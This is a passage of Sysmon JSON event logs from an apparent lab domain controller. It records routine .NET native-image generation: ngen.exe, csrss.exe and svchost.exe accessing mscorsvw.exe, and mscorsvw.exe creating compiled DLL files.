C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:30.851","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00100B400B00}","TargetProcessId":"4252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7256,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:31.398\r\nProcessGuid: {41C8662E-224A-5F25-0000-0010BCB90C00}\r\nProcessId: 4252\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\109c-0\\Microsoft.VisualBasic.Activities.Compiler.dll\r\nCreationUtcTime: 2020-08-01 08:05:31.398","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:31.398","ProcessGuid":"{41C8662E-224A-5F25-0000-0010BCB90C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\109c-0\\Microsoft.VisualBasic.Activities.Compiler.dll","CreationUtcTime":"2020-08-01 08:05:31.398","EventReceivedTime":"2020-08-01 08:05:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7257,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:31.445\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00102C470B00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:31.445","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00102C470B00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7258,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:31.445\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00102C470B00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:31.445","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00102C470B00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7259,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:31.445\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00102C470B00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:31.445","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2230-5F25-0000-00102C470B00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7260,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:31.788\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224B-5F25-0000-001058C10C00}\r\nTargetProcessId: 4256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:31.788","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224B-5F25-0000-001058C10C00}","TargetProcessId":"4256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7261,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:31.788\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224B-5F25-0000-001058C10C00}\r\nTargetProcessId: 4256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:31.788","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224B-5F25-0000-001058C10C00}","TargetProcessId":"4256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7262,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:31.788\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224B-5F25-0000-001058C10C00}\r\nTargetProcessId: 4256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:31.788","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224B-5F25-0000-001058C10C00}","TargetProcessId":"4256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7263,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:33.491\r\nProcessGuid: {41C8662E-224B-5F25-0000-001058C10C00}\r\nProcessId: 4256\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10a0-0\\Microsoft.VisualBasic.Compatibility.dll\r\nCreationUtcTime: 2020-08-01 08:05:33.491","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:33.491","ProcessGuid":"{41C8662E-224B-5F25-0000-001058C10C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10a0-0\\Microsoft.VisualBasic.Compatibility.dll","CreationUtcTime":"2020-08-01 08:05:33.491","EventReceivedTime":"2020-08-01 08:05:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7264,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:33.538\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-00109C4E0B00}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\